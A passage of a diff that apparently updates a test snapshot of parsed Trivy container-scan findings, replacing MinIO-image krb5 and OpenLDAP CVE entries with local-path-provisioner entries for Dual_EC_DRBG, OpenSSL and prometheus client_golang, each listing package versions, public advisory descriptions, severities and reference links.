"Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "openssl: RSA authentication weakness", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-2953", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", + "fixedVersion": "1.11.1", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-21698", + "installedVersion": "v1.1.0", + "packageName": "github.com/prometheus/client_golang", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-2953", - "https://bugs.openldap.org/show_bug.cgi?id=9904", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", - "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "https://access.redhat.com/errata/RHSA-2022:8057", + "https://access.redhat.com/security/cve/CVE-2022-21698", + "https://bugzilla.redhat.com/2044628", + "https://bugzilla.redhat.com/2045880", + "https://bugzilla.redhat.com/2050648", + "https://bugzilla.redhat.com/2050742", + "https://bugzilla.redhat.com/2050743", + "https://bugzilla.redhat.com/2065290", + "https://bugzilla.redhat.com/2107342", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107376", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2107390", + "https://bugzilla.redhat.com/2107392", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", + "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "https://errata.rockylinux.org/RLSA-2022:8057", + "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "https://github.com/prometheus/client_golang/pull/962", + "https://github.com/prometheus/client_golang/pull/987", + "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "https://linux.oracle.com/cve/CVE-2022-21698.html", + "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "https://pkg.go.dev/vuln/GO-2022-0322", + "https://www.cve.org/CVERecord?id=CVE-2022-21698", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "null pointer dereference in ber_memalloc_x function", + "name": "Denial of service using InstrumentHandlerCounter", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2953", + "value": "https://avd.aquasec.com/nvd/cve-2022-21698", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2953", + "value": "https://access.redhat.com/errata/RHSA-2022:8057", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9904", + "value": "https://access.redhat.com/security/cve/CVE-2022-21698", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2953", + "value": "https://bugzilla.redhat.com/2044628", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2953", + "value": "https://bugzilla.redhat.com/2045880", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2953", + "value": "https://bugzilla.redhat.com/2050648", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2015-3276", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://rhn.redhat.com/errata/RHSA-2015-2131.html", - "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", - "http://www.securitytracker.com/id/1034221", - "https://access.redhat.com/security/cve/CVE-2015-3276", - "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", - "https://linux.oracle.com/cve/CVE-2015-3276.html", - "https://linux.oracle.com/errata/ELSA-2015-2131.html", - "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", - "https://www.cve.org/CVERecord?id=CVE-2015-3276", - ], - }, - "category": "Vulnerability", - "description": "The nss_parse_ciphers function in libraries/libldap/tls_m.c in OpenLDAP does not properly parse OpenSSL-style multi-keyword mode cipher strings, which might cause a weaker than intended cipher to be used and allow remote attackers to have unspecified impact via unknown vectors.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "incorrect multi-keyword mode cipherstring parsing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2015-3276", + "value": "https://bugzilla.redhat.com/2050742", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2015-2131.html", + "value": "https://bugzilla.redhat.com/2050743", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html", + "value": "https://bugzilla.redhat.com/2065290", }, { "type": "URL", - "value": "http://www.securitytracker.com/id/1034221", + "value": "https://bugzilla.redhat.com/2107342", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2015-3276", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1238322", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2015-3276.html", + "value": "https://bugzilla.redhat.com/2107376", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2015-2131.html", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2015-3276", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2015-3276", + "value": "https://bugzilla.redhat.com/2107388", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-14159", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://www.openldap.org/its/index.cgi?findid=8703", - "https://access.redhat.com/security/cve/CVE-2017-14159", - "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", - "https://www.cve.org/CVERecord?id=CVE-2017-14159", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "slapd in OpenLDAP 2.4.45 and earlier creates a PID file after dropping privileges to a non-root account, which might allow local users to kill arbitrary processes by leveraging access to this non-root account for PID file modification before a root script executes a "kill \`cat /pathname\`" command, as demonstrated by openldap-initscript.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "openldap: Privilege escalation via PID file manipulation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-14159", + "value": "https://bugzilla.redhat.com/2107390", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi?findid=8703", + "value": "https://bugzilla.redhat.com/2107392", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-14159", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-14159", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-14159", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-17740", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", - "http://www.openldap.org/its/index.cgi/Incoming?id=8759", - "https://access.redhat.com/security/cve/CVE-2017-17740", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", - "https://www.cve.org/CVERecord?id=CVE-2017-17740", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "contrib/slapd-modules/nops/nops.c in OpenLDAP through 2.4.45, when both the nops module and the memberof overlay are enabled, attempts to free a buffer that was allocated on the stack, which allows remote attackers to cause a denial of service (slapd crash) via a member MODDN operation.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "openldap: contrib/slapd-modules/nops/nops.c attempts to free stack buffer allowing remote attackers to cause a denial of service", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00053.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00058.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { "type": "URL", - "value": "http://www.openldap.org/its/index.cgi/Incoming?id=8759", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-17740", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-15719", - "installedVersion": "2.4.57+dfsg-3+deb11u1", - "packageName": "libldap-2.4-2", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", - "https://access.redhat.com/errata/RHBA-2019:3674", - "https://access.redhat.com/security/cve/CVE-2020-15719", - "https://bugs.openldap.org/show_bug.cgi?id=9266", - "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", - "https://www.cve.org/CVERecord?id=CVE-2020-15719", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - ], - }, - "category": "Vulnerability", - "description": "libldap in certain third-party OpenLDAP packages has a certificate-validation flaw when the third-party package is asserting RFC6125 support. It considers CN even when there is a non-matching subjectAltName (SAN). This is fixed in, for example, openldap-2.4.46-10.el8 in Red Hat Enterprise Linux.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "openldap: Certificate validation incorrectly matches name against CN-ID", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00033.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00059.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHBA-2019:3674", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", }, { "type": "URL", - "value": "https://bugs.openldap.org/show_bug.cgi?id=9266", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1740070", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-15719", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libmount1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://errata.rockylinux.org/RLSA-2022:8057", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://github.com/prometheus/client_golang/pull/962", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", - "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - 